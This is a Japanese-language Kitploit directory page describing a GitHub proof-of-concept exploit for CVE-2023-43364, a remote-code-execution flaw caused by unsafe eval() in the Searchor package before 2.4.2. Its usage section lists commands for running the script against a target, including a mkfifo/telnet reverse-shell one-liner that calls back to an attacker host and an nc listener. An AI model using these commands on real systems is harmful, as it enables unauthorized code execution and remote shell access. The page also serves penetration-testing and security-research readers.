Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-43364-Searchor-RCE-Exploit — Searchor(< 2.4.2)における安全でない `eval()` 使用を介した POC エクスプロイト | Kitploit
ツール/GitHubGitHub/herick-costa/cve-2023-43364-searchor-rce-exploit
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubherick-costa/cve-2023-43364-searchor-rce-exploit

CVE-2023-43364-Searchor-RCE-Exploit

Searchor(< 2.4.2)における安全でない `eval()` 使用を介した POC エクスプロイト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
11ヶ月前未レビュー

CVE-2023-43364 – Searchor RCE Exploit (PoC)

安全でない eval() の使用による Searchor (< 2.4.2) のリモートコード実行(RCE)

概要

このプロジェクトは、Pythonパッケージ Searchor (< 2.4.2) に影響を与えるリモートコード実行(RCE)脆弱性である CVE-2023-43364 の悪用を実証します。

この問題は、ユーザー制御の入力に対する安全でない eval() の使用に起因し、攻撃者が任意のPythonコードを注入して実行できるようにします。

この脆弱性は、公式パッチに示されているように、安全でない eval() の使用を削除することで修正されました。

  • https://github.com/ArjunSharda/Searchor/commit/16016506f7bf92b0f21f51841d599126d6fcd15b

追加の技術詳細とアドバイザリ:

  • https://github.com/advisories/GHSA-66m2-493m-crh2

このPoCは、コマンド実行、テスト検証、リバースシェルを含む複数の実行方法を提供します。

使い方

RCEテスト

コード実行を確認するために、簡単なコマンド(id)を実行します:

root@kitploit:~
python3 CVE-2023-43364.py <URL> --test

任意のコマンドを実行 ターゲットサーバー上で任意のコマンドを実行します:

root@kitploit:~
python3 CVE-2023-43364.py <URL> -a "whoami"

例:

root@kitploit:~
python3 CVE-2023-43364.py <URL> -a "TF=$(mktemp -u);mkfifo $TF && telnet IP PORT 0<$TF | sh 1>$TF"
python3 CVE-2023-43364.py <URL> -a "ls -la"

リバースシェル お使いのマシンでリスナーを起動します:

root@kitploit:~
nc -lvnp 4444

エクスプロイトを実行します:

root@kitploit:~
python3 CVE-2023-43364.py <URL> <LHOST>

⚠️ 免責事項

このプロジェクトは、以下を目的としています:

  • 教育目的
  • セキュリティ研究
  • 許可されたペネトレーションテストのみ

作者は、このツールによって引き起こされた誤用や損害について責任を負いません。

このエクスプロイトは、管理された環境、または明示的なテスト許可を得たシステムでのみ使用してください。

ツールをダウンロード